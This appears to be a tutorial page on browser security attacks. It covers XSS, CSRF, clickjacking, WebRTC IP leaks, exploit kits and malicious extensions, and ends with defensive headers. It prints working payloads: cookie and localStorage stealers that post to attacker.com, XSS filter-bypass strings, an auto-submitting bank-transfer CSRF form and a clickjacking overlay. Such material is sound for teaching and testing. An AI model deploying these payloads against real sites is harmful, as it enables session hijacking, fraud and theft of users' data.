Browser Security Attacks NEW
The browser is the most complex application most users run. Millions of lines of code parsing untrusted content from the internet. Every feature is a potential attack surface: JavaScript engines, DOM parsing, extensions, WebRTC, service workers, and more.
Browsers trust websites to provide code (JavaScript) that runs on users' machines. The same-origin policy tries to isolate sites from each other, but it's constantly under attack. Every SOP bypass is a potential account takeover.
Cross-Site Scripting (XSS)
Inject malicious JavaScript into web pages viewed by other users. The classic web vulnerability that refuses to die. Still in OWASP Top 10 after 20+ years.
Reflected XSS
# Vulnerable URL:
https://target.com/search?q=<script>alert(document.cookie)</script>
# Server reflects input in response:
<h1>Search results for: <script>alert(document.cookie)</script></h1>
# Victim clicks attacker's link → script executes in victim's browser
# Attacker receives victim's session cookie
# Real payload (cookie stealer):
<script>
new Image().src='https://attacker.com/steal?c='+document.cookie;
</script>
# URL-encoded for delivery:
https://target.com/search?q=%3Cscript%3Enew%20Image().src%3D%27https%3A%2F%2Fattacker.com%2Fsteal%3Fc%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3EStored XSS
# Payload stored in database, served to all users
# Comment field:
<script>
fetch('https://attacker.com/log', {
method: 'POST',
body: JSON.stringify({
cookies: document.cookie,
url: location.href,
localStorage: JSON.stringify(localStorage)
})
});
</script>
# Every user who views the page executes the script
# Mass credential theft, worm propagation possible
# Famous example: Samy worm (MySpace, 2005)
# - Stored XSS in profile
# - Added attacker as friend
# - Copied itself to victim's profile
# - 1 million infections in 20 hoursDOM-Based XSS
# Vulnerable JavaScript (client-side only):
var name = location.hash.substring(1);
document.getElementById('greeting').innerHTML = 'Hello, ' + name;
# Attack URL:
https://target.com/page#<img src=x onerror=alert(document.cookie)>
# Payload never hits server - pure client-side vulnerability
# Harder to detect with server-side WAFs
# Common DOM XSS sinks:
innerHTML, outerHTML, document.write(), eval(),
setTimeout(), setInterval(), location.href,
jQuery.html(), $.append()XSS Filter Bypasses
# Case variation
<ScRiPt>alert(1)</sCrIpT>
# Event handlers
<img src=x onerror=alert(1)>
<body onload=alert(1)>
<svg onload=alert(1)>
<input onfocus=alert(1) autofocus>
# JavaScript protocol
<a href="javascript:alert(1)">click</a>
# Encoding
<script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert(1)</script>
# Breaking out of attributes
" onclick="alert(1)
' onclick='alert(1)
# Template literals (ES6)
<script>alert`1`</script>
# Without parentheses
<script>onerror=alert;throw 1</script>
<script>{onerror=alert}throw 1</script>
# SVG-based
<svg><script>alert(1)</script></svg>
# Mutation XSS (mXSS) - exploits HTML parser differences
<noscript><p title="</noscript><script>alert(1)</script>">Detect blind XSS with automatic screenshots and data exfiltration.
xsshunter.comCross-Site Request Forgery (CSRF)
Trick a user's browser into making unwanted requests to sites where they're authenticated. The browser automatically includes cookies, so the forged request appears legitimate.
<!-- Attacker's page: evil.com/cats.html -->
<h1>Cute Cat Pictures!</h1>
<!-- Hidden form that submits automatically -->
<form action="https://bank.com/transfer" method="POST" id="csrf">
<input type="hidden" name="to" value="attacker_account">
<input type="hidden" name="amount" value="10000">
</form>
<script>document.getElementById('csrf').submit();</script>
<!-- Or with an image (GET request) -->
<img src="https://bank.com/transfer?to=attacker&amount=10000">
<!-- Victim visits evil.com while logged into bank.com -->
<!-- Browser sends bank.com cookies with the forged request -->
<!-- Bank sees valid session, processes transfer -->CSRF Defenses & Bypasses
# CSRF Token bypass techniques:
# 1. Token not validated
# - Remove token parameter entirely
# - Server doesn't check if missing
# 2. Token tied to wrong session
# - Use your own valid token for victim
# - Server validates token exists, not ownership
# 3. Token in GET parameter
https://target.com/action?csrf=abc123&do=something
# Referer header leaks token to attacker
# 4. Token only checked for POST
# - Convert POST to GET
# - Server only validates POST requests
# 5. Weak token generation
# - Predictable tokens (timestamp, sequential)
# - Brute-forceable short tokens
# SameSite cookie bypass:
# SameSite=Lax allows GET from top-level navigation
# Convert POST action to GET if server accepts bothClickjacking
Overlay invisible iframes on top of decoy content. User thinks they're clicking a button, but actually clicking something in the hidden iframe.
<!-- Attacker's page -->
<style>
iframe {
position: absolute;
top: 0;
left: 0;
width: 500px;
height: 200px;
opacity: 0.0001; /* Nearly invisible */
z-index: 2;
}
.decoy-button {
position: absolute;
top: 50px;
left: 100px;
z-index: 1;
}
</style>
<div class="decoy-button">
<h1>Click to Win iPhone!</h1>
<button>CLAIM PRIZE</button>
</div>
<!-- Invisible iframe positioned so "Delete Account" aligns with decoy button -->
<iframe src="https://target.com/settings"></iframe>
<!-- User clicks "CLAIM PRIZE" but actually clicks "Delete Account" -->Clickjacking Variants
- Likejacking: Trick users into "liking" content (Facebook)
- Cursorjacking: Hide real cursor, show fake one offset from actual
- Filejacking: Trick users into downloading/uploading files
- Drag-and-drop: Hijack drag operations to exfiltrate data
WebRTC IP Leaks
WebRTC can reveal a user's real IP address even when using VPN or Tor. JavaScript can enumerate local network interfaces.
// Discover local IPs via WebRTC
const rtc = new RTCPeerConnection({iceServers: []});
rtc.createDataChannel('');
rtc.createOffer().then(offer => rtc.setLocalDescription(offer));
rtc.onicecandidate = (event) => {
if (event.candidate) {
// Extract IP from ICE candidate
const ip = event.candidate.candidate.match(
/([0-9]{1,3}\.){3}[0-9]{1,3}/
);
if (ip) {
console.log('Discovered IP:', ip[0]);
// Send to attacker server
fetch('https://attacker.com/log?ip=' + ip[0]);
}
}
};
// Can reveal:
// - Local IP (192.168.x.x, 10.x.x.x)
// - VPN tunnel IP
// - Real public IP (bypassing VPN in some cases)Browser Exploitation
Memory corruption bugs in browsers can lead to arbitrary code execution. Drive-by downloads without user interaction.
Exploit Delivery Methods
- Malvertising: Malicious ads on legitimate sites
- Watering hole: Compromise sites targets visit
- Phishing: Links to exploit pages
- Exploit kits: Automated browser fingerprinting and exploitation
# Exploit Kit (EK) typical flow:
1. Traffic Distribution System (TDS)
- Filters bots, researchers, repeated visits
- Redirects real victims to EK landing page
2. Landing Page
- Fingerprints browser, plugins, OS
- Checks for virtualization (sandbox detection)
- Selects appropriate exploit
3. Exploit Delivery
- Serves exploit for detected vulnerability
- Common targets: Browser engine, Flash, Java, PDF
- Multiple exploits tried in sequence
4. Payload Execution
- Shellcode downloads malware
- Persistence mechanisms installed
- C2 communication established
# Famous EKs (now largely defunct):
# Angler, RIG, Magnitude, Nuclear, BlackholeMalicious Browser Extensions
Browser extensions have deep access to browsing data. Malicious or compromised extensions can steal everything.
# Dangerous permissions in manifest.json:
"permissions": [
"<all_urls>", // Access ALL websites
"webRequest", // Intercept/modify requests
"webRequestBlocking", // Block requests
"tabs", // Access all open tabs
"cookies", // Read ALL cookies
"history", // Browsing history
"storage", // Unlimited storage
"clipboardRead", // Read clipboard
"nativeMessaging" // Launch native apps
]
# What malicious extensions can do:
# - Steal all passwords (inject into login forms)
# - Read all cookies (session hijacking)
# - Modify banking pages (inject fake forms)
# - Cryptomining in background
# - Proxy all traffic through attacker server
# - Keylogging
# Attack vectors:
# - Malicious extension in store
# - Legitimate extension sold to malicious buyer
# - Extension update compromised
# - Sideloading via social engineeringBrowser Security Headers
# Content Security Policy - Mitigate XSS
Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'
# Prevent clickjacking
X-Frame-Options: DENY
Content-Security-Policy: frame-ancestors 'none'
# Prevent MIME sniffing
X-Content-Type-Options: nosniff
# Enable XSS filter (legacy)
X-XSS-Protection: 1; mode=block
# Strict transport security
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
# Referrer policy
Referrer-Policy: strict-origin-when-cross-origin
# Permissions policy (disable dangerous features)
Permissions-Policy: geolocation=(), camera=(), microphone=()Browser Attack Tools
Browser Exploitation Framework - hook browsers and control them.
beefproject.comAdvanced XSS detection with fuzzing and filter bypass.
python xsstrike.py -u "https://target.com/?q="
Fast parameter analysis and XSS scanning.
dalfox url "https://target.com/?q=test"
Google's tool to analyze and find weaknesses in CSP.
csp-evaluator.withgoogle.com